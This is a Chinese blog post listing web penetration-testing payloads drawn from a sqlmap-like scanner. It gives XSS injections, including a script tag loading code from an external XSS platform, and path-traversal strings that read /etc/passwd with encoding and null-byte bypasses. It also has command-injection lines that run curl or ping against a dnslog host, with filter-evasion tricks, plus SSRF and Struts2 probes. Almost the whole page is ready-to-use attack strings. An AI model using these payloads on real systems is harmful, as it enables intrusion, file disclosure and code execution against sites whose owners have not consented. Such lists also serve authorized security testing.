web渗透测试常用payload

常用web漏洞测试的payload整理,把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来,供大家测试时参考。

[反射型xss]

[在html形成]
  1. "'>
  2. [random]";>

[在js形成]
  1. document.title= "[random]"; //
  2. ; document.title= "[random]"; //
  3. ";document.title="[random] ";
  4. ';document.title="[random] ";
  5. "); document.title= "[random]";
  6. ');document.title="[random]";


[在html属性形成(img)]
  1. 888 " οnlοad=document.title="[random] " a="
  2. 888 ' οnlοad=document.title="[random]" a='
  3. 888 οnlοad= document.title= "[random]"

[存储型xss]
[通用payload]

测试环境,需要在触发的地方查看payload显示情况

  1. [Bypass on Event] [事件型绕过]
  2. #一般富文本不会过滤img标签
  3. [Bypass pseudo protocol] [伪协议绕过]
  4. [Bypass html5 tag] [html5标签绕过]
  5. [Bypass html or js encode] [js编码,html编码,十进制编码绕过等]
  6. 如果进行盲测可以根据xss平台地址替换相应的js触发代码
  7. "> <script src=http://myxss.net/xxxxxx> script>



[静态文件读取]
  1. [常规检测]
  2. /../../../../../../../../../../../etc/passwd
  3. /../../../../../../../../../../../etc/hosts
  4. /../../../../../../../C: /Windows/system.ini [windows]
  5. [伪造绕过]
  6. /././././././././././././././././././././././././../../../../../../../../etc/passwd
  7. /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
  8. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  9. /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
  10. /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
  11. /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/hosts


[后缀绕过]
  1. /../../../../../../../../../../../etc/passwd #
  2. /../../../../../../../../../../../etc/passwd%00
  3. /../../../../../../../../../../../etc/passwd #.jpg
  4. /../../../../../../../../../../../etc/passwd%00.jpg
  5. /../../../../../../../../../../../etc/passwd #.html
  6. /../../../../../../../../../../../etc/passwd%00.html
  7. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd #
  8. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd #.jpg
  9. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd #.html
  10. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.jpg
  11. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.html


[命令执行漏洞]
  1. [常规检测]
  2. ;curl [random].test.dnslog.link
  3. | curl [random].test.dnslog.link
  4. | ping -n 2 [random].test.dnslog.link [Windows]
  5. | ping -c 2 [random].test.dnslog.link [Linux]
  6. [绕过检测]
  7. ;curl [random].test.dnslog.link #
  8. | curl [random].test.dnslog.link #
  9. %20|%20curl%20[random].test.dnslog.link
  10. %20|%20curl%20[random].test.dnslog.link #
  11. %20|%20ping%20-n%202%20[random].test.dnslog.link
  12. %20|%20ping%20-c%202%20[random].test.dnslog.link #
  13. a=p;b=ing;c=c;d= 2;$a$b -$c $d [random].test.dnslog.link
  14. a=c;b=url;$a$b [random].test.dnslog.link #
  15. ${IFS}|${IFS}curl${IFS}[random].test.dnslog.link
  16. ${IFS}|${IFS}ping${IFS}-c${IFS} 2${IFS}[random].test.dnslog.link
  17. a=p;b=ing;c=c;d= 2;$a$b {IFS}-$c {IFS}$d {IFS}[random].test.dnslog.link
  18. a=c;b=url;$a$b {IFS}[random].test.dnslog.link #


[ssrf漏洞]
http://[random].test.dnslog.link/


[strust2命令执行]
?redirect:http://[random].test.dnslog.link/%25{3*4}

你可能感兴趣的:(web安全)